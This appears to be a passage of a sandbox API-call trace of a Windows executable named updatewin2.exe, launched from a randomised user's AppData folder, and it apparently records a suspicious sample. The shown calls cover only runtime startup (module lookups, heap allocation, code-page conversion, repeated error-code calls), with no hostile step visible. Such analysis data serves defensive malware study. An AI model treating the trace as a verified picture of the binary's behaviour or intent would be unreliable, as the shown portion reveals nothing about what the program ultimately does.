GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.127] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.127] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.127] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.127] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.127] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.128] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.128] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x214) returned 0x1f807d0 [0077.129] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.129] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.129] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.129] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.129] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0077.130] GetCurrentThreadId () returned 0x924 [0077.130] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.130] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x8, Size=0x800) returned 0x1f809f0 [0077.130] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0077.130] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0077.130] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0077.130] SetHandleCount (uNumber=0x20) returned 0x20 [0077.130] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe\" " [0077.130] GetEnvironmentStringsW () returned 0x5b4e70* [0077.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0077.219] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x565) returned 0x1f811f8 [0077.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1f811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0077.219] FreeEnvironmentStringsW (penv=0x5b4e70) returned 1 [0077.219] GetLastError () returned 0x0 [0077.219] SetLastError (dwErrCode=0x0) [0077.219] GetLastError () returned 0x0 [0077.219] SetLastError (dwErrCode=0x0) [0077.219] GetLastError () returned 0x0 [0077.219] SetLastError (dwErrCode=0x0) [0077.219] GetACP () returned 0x4e4 [0077.220] RtlAllocateHeap (HeapHandle=0x1f80000, Flags=0x0, Size=0x220) returned 0x1f81768 [0077.220] GetLastError () returned 0x0 [0077.220] SetLastError (dwErrCode=0x0) [0077.220] IsValidCodePage (CodePage=0x4e4) returned 1 [0077.220] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0077.220] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0077.220] GetLastError () returned 0x0 [0077.220] SetLastError (dwErrCode=0x0) [0077.220] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0077.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.220] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0077.220] GetLastError () returned 0x0 [0077.220] SetLastError (dwErrCode=0x0) [0077.220] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0077.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.220] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ") returned 256 [0077.220] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0077.221] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåka\x88\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.221] GetLastError () returned 0x0 [0077.221] SetLastError (dwErrCode=0x0) [0077.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ") returned 256 [0077.221] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0077.221] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ턺躇㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0077.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåka\x88\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.221] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe")) returned 0x5f [0077.221] GetLastError () returned 0x0 [0077.221] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.222] GetLastError () returned 0x0 [0077.222] SetLastError (dwErrCode=0x0) [0077.223] GetLastError () returned 0x0 [0077.223] SetLastError (dwErrCode=0x0) [0077.223] GetLastError () returned 0x0 [0077.223] SetLastError (dwErrCode=0x0) [0077.223] GetLastError () returned 0x0 [0077.223] SetLastError (dwErrCode=0x0) [0077.223] GetLastError () returned 0x0 [0077.223] SetLastError (dwErrCode=0x0) [0077.223] GetLastError () returned 0x0 [0077.223] SetLastError (dwErrCode=0x0) [0077.224] GetLastError () returned 0x0 [0077.224] SetLastError (dwErrCode=0x0) [0077.224] GetLastError () returned 0x0 [0077.224] SetLastError (dwErrCode=0x0) [0077.224] GetLastError () returned 0x0 [0077.224] SetLastError (dwErrCode=0x0) [0077.224] GetLastError () returned 0x0 [0077.224] SetLastError (dwErrCode=0x0) [0077.224] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.225] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.225] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.225] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.225] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.225] GetLastError () returned 0x0 [0077.225] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.226] GetLastError () returned 0x0 [0077.226] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.227] GetLastError () returned 0x0 [0077.227] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.228] GetLastError () returned 0x0 [0077.228] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.229] SetLastError (dwErrCode=0x0) [0077.229] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.230] SetLastError (dwErrCode=0x0) [0077.230] GetLastError () returned 0x0 [0077.231] SetLastError (dwErrCode=0x0) [0077.231] GetLastError () returned 0x0 [0077.231] SetLastError (dwErrCode=0x0) [0077.231] GetLastError () returned 0x0 [0077.231] SetLastError (dwErrCode=0x0) [0077.231] GetLastError () returned 0x0 [0077.231] SetLastError (dwErrCode=0x0) [0077.231] GetLastError () returned 0x0 [0077.231] SetLastError (dwErrCode=0x0) [0077.231] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.232] SetLastError (dwErrCode=0x0) [0077.232] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.233] SetLastError (dwErrCode=0x0) [0077.233] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.234] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.234] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.234] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.234] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.234] GetLastError () returned 0x0 [0077.234] SetLastError (dwErrCode=0x0) [0077.235] GetLastError () returned 0x0 [0077.235] SetLastError (dwErrCode=0x0) [0077.235] GetLastError () returned 0x0 [0077.235] SetLastError (dwErrCode=0x0) [0077.235] GetLastError () returned 0x0 [0077.235] SetLastError (dwErrCode=0x0) [0077.235] GetLastError () returned 0x0 [0077.235] SetLastError (dwErrCode=0x0) [0077.235] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.236] SetLastError (dwErrCode=0x0) [0077.236] GetLastError () returned 0x0 [0077.237] SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.237] SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.237] SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.237] SetLastError (dwErrCode=0x0) [0077.237] GetLastError () returned 0x0 [0077.237] 